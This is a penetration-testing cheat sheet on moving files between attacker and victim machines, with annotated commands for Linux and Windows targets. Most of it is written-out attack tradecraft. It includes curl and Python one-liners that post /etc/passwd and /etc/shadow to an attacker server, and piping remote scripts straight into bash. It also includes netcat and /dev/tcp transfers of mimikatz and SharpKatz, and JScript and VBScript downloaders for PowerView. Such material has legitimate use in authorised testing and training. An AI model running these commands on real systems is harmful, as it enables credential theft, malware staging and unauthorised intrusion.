Resources
Cheat sheet
Download & Upload from Linux to Linux
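- base64
# Attacker: hash the file you are about to encode so the receiver can verify the decoded copy is intact
md5sum pass.txt
cat pass.txt | base64 -w 0; echo                           # -w 0: one line, safe to paste through a shell/terminal
OR
cat pass.txt | base64 -w 0 | xclip -selection clipboard    # NOTE: the secret stays in the X clipboard until something overwrites it
openssl base64 -in test.js -A; echo                        # -A: no line wrapping (same effect as -w 0)
# Victim
echo 'MTIzDQozMjENCjEyMzEyMw0KMTIzMTIzMTIzDQo' | base64 -d > pass.txt
md5sum pass.txt                                            # must match the attacker-side hash before the file is used
# Tips & Tricks
# Large files
base64 test.js -w0 | fold -w 1000                          # fixed-width lines are easier to paste; `base64 -d` accepts the wrapped input as-is
split -b 50K nc64.exe part_                                # then base64 each part; receiver: cat part_* > nc64.exe && md5sum nc64.exe (compare with the sender's hash)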
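- Web
# Attacker: plain-HTTP file servers (no TLS). http.server is bound to 80 here; SimpleHTTPServer and php listen on 8000
python3 -m http.server 80
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
# Victim: scheme and port must match the server started above -- these servers speak http://, a https:// URL fails the TLS handshake
wget http://192.168.99.22/LinEnum.sh -O /tmp/LinEnum.sh    # use :8000 for the SimpleHTTPServer / php variants
# Fileless: pin the URL to a commit hash instead of `master`, otherwise the code you execute can change under you
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 # Fileless
# Attacker
python3 -m http.server 80
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
# Victim (same scheme/port rule as above)
curl -o /tmp/LinEnum.sh http://192.168.99.22/LinEnum.sh
# -f: curl exits silently on an HTTP error instead of piping the error page into bash; -sSL: quiet, but still report failures, follow redirects
curl -fsSL https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash # Fileless
# Attacker: HTTPS upload endpoint (self-signed cert, so the client has to skip verification or trust server.pem)
python3 -m pip install uploadserver --break-system-packages
openssl req -x509 -newkey rsa:2048 -days 365 -nodes -keyout server.pem -out server.pem -subj "/CN=server"
python3 -m uploadserver 443 --server-certificate server.pem    # the file generated above, in the current directory
# Victim: --insecure disables certificate verification, so anything on-path could intercept /etc/shadow --
# acceptable in a lab; otherwise copy server.pem to the target and use `--cacert server.pem` instead
curl -X POST https://192.168.99.22/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure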
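- /dev/tcp
# Attacker
python3 -m http.server 8000
php -S 0.0.0.0:8000
# Victim (bash only: /dev/tcp/<host>/<port> is a bash feature, sh/dash do not have it)
exec 3<>/dev/tcp/192.168.99.22/8000
# Connection: close makes the server hang up after the response, so `cat` below does not block on a kept-alive socket
echo -e "GET /sub.txt HTTP/1.1\r\nHost: 192.168.99.22\r\nConnection: close\r\n\r\n" >&3
cat <&3                                   # raw response: HTTP headers followed by the body
# To keep only the body, drop everything up to the first blank line:   cat <&3 | sed '1,/^\r$/d' > /tmp/sub.txt
exec 3>&-                                 # close the descriptor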
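- SSH
- SCP
# Attacker: `start` is enough for an engagement; `enable` also brings sshd up on every boot (persistent change -- undo it afterwards)
systemctl enable ssh
systemctl start ssh
# `sshpass -p` puts the password on the command line, readable by every local user via `ps`; -e takes it from $SSHPASS instead
SSHPASS=123 sshpass -e scp /root/Trash/pass.txt fady@192.168.99.21:/home/fady/pass.txt # Send
SSHPASS=123 sshpass -e scp fady@192.168.99.21:./test.txt /root/Trash/test.txt          # Receive
# Tips & Tricks
# New user (Evasion): a throwaway unprivileged account on the receiving box -- presumably so the transfer never uses root credentials; confirm
sudo useradd -m -s /bin/bash recv
sudo passwd recv
# Sending directory: tar streams through the ssh session; tar strips the leading "/" from member names
tar -czf - /root/Trash | ssh fady@192.168.99.21 'cat > /home/fady/Trash.tar.gz'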
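- Lolbins
- Download
# Attacker: self-signed cert, then push the file over TLS with s_server
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# -naccept 1: exit after one client, so the tool is not left on a listener that anyone on the network can pull from
openssl s_server -quiet -accept 443 -cert certificate.pem -key key.pem -naccept 1 < /root/Tools/exe/mimikatz.exe
md5sum /root/Tools/exe/mimikatz.exe
# Victim: -quiet suppresses the session chatter so only the file bytes reach stdout; compare the hash before running it
openssl s_client -connect 192.168.99.22:443 -quiet > mimo.exe
md5sum mimo.exe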
Languages
# Http servers (both default to port 8000 when none is given)
python3 -m http.server
python2.7 -m SimpleHTTPServer
# One liners Download (urllib: stdlib, works on a target with no extra packages)
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
# One liners Upload -- posts to the uploadserver module's /upload endpoint (default port 8000)
# NOTE: `requests` is third-party and often missing on a target; check with `python3 -c "import requests"` first
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
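# Http servers
php -S 0.0.0.0:8000
# One liners Download (all three need allow_url_fopen=On in the target's php.ini)
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
# Fileless. The original used `@file(...)`, which hides a failed download: $lines becomes false and the foreach warning (CLI prints it on stdout) is what ends up piped into bash.
# Fail explicitly on stderr instead, so nothing unexpected reaches the shell.
php -r '$lines = file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); if ($lines === false) { fwrite(STDERR, "download failed\n"); exit(1); } foreach ($lines as $line) { echo $line; }' | bash # Fileless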
# Http servers (un: stdlib WEBrick wrapper; serves the current directory on 8000)
ruby -run -ehttpd . -p8000
# One liners Download (net/http is stdlib; Net::HTTP.get returns the body as a string, written straight to disk)
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
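# Http servers
cpan HTTP::Server::Simple::CGI
# NOTE(review): this only instantiates the base class on port 80; as far as I can tell it does not serve files from the cwd unless handle_request is overridden -- verify before relying on it
perl -MHTTP::Server::Simple::CGI -e 'my $s = new HTTP::Server::Simple::CGI(80); $s->run();'
# One liners Download
# getstore returns the HTTP status code; without the check a 404 leaves an error page in LinEnum.sh and no indication of failure
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh") == 200 or die "download failed\n";'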
# Victim (Windows: cscript.exe runs the JScript below under the Windows Script Host; args are <url> <destination>)
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
# Download Content File (wget.js) -- note the URL tracks the moving `dev` branch; pin to a commit hash for a reproducible payload
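// wget.js <url> <destination>: synchronous GET via WinHttpRequest, raw body written to disk through ADODB.Stream.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
// Without this check a 404/500 page would be saved under the destination name and mistaken for the tool.
if (WinHttpReq.Status != 200) {
    WScript.Echo("download failed: HTTP " + WinHttpReq.Status);
    WScript.Quit(1);
}
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1; // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
// 2 = adSaveCreateOverWrite. The original omitted the flag, so the default (adSaveCreateNotExist) throws
// when the destination already exists -- the .vbs twin of this script already passes 2.
BinStream.SaveToFile(WScript.Arguments(1), 2);
BinStream.Close();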
# Victim (Windows: cscript.exe runs the VBScript below; args are <url> <destination>)
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
# Download Content File (wget.vbs) -- same caveat as wget.js: `dev` is a moving branch, pin to a commit hash
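' wget.vbs <url> <destination>: synchronous GET via XMLHTTP, raw body written to disk through ADODB.Stream.
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
' Without this check a 404/500 page would be saved under the destination name and mistaken for the tool.
If xHttp.Status <> 200 Then
    WScript.Echo "download failed: HTTP " & xHttp.Status
    WScript.Quit 1
End If
with bStrm
.type = 1                                   ' adTypeBinary
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2    ' 2 = adSaveCreateOverWrite
.close                                      ' release the stream/file handle
end with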
Misc
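- Nc or Netcat
# Victim listens, attacker connects in (needs a port on the victim that is reachable from the attacker)
nc -l -p 8000 > mimikatz.exe
ncat -l -p 8000 --recv-only > SharpKatz.exe
# Reverse: the victim connects OUT to the attacker. Use this when the victim's firewall blocks INBOUND connections
# (the original note said "outbound", which is backwards); 443 is chosen because egress filtering usually allows it
nc 192.168.99.22 443 > mimikatz.exe # Victim
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
# Attacker: -q 0 / --send-only close the connection once stdin hits EOF -- without them the receiver never sees end-of-file
nc -q 0 192.168.99.21 8000 < mimikatz.exe          # target = the host listening above
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
# Reverse
nc -l -p 443 -q 0 < mimikatz.exe # Attacker
ncat -l -p 443 --send-only < SharpKatz.exe
# Tips & Tricks
# No nc/netcat on the target: bash can open the TCP socket itself (bash only; pairs with the "Reverse" attacker listeners above)
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
# Everything in this section is plaintext TCP with no integrity check: compare md5sum on both ends before running what arrived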
Data Protection
# Encrypt before transfer. -pbkdf2 with -iter 100000 derives the key from the prompted passphrase; without -pbkdf2 openssl
# falls back to its legacy single-pass key derivation (it prints a deprecation warning for that).
# NOTE: -aes256 is AES-256-CBC -- confidentiality only, no integrity. Hash the plaintext first and verify after decrypting.
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
# Decrypt with exactly the same KDF options, otherwise the derived key differs and the output is garbage
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd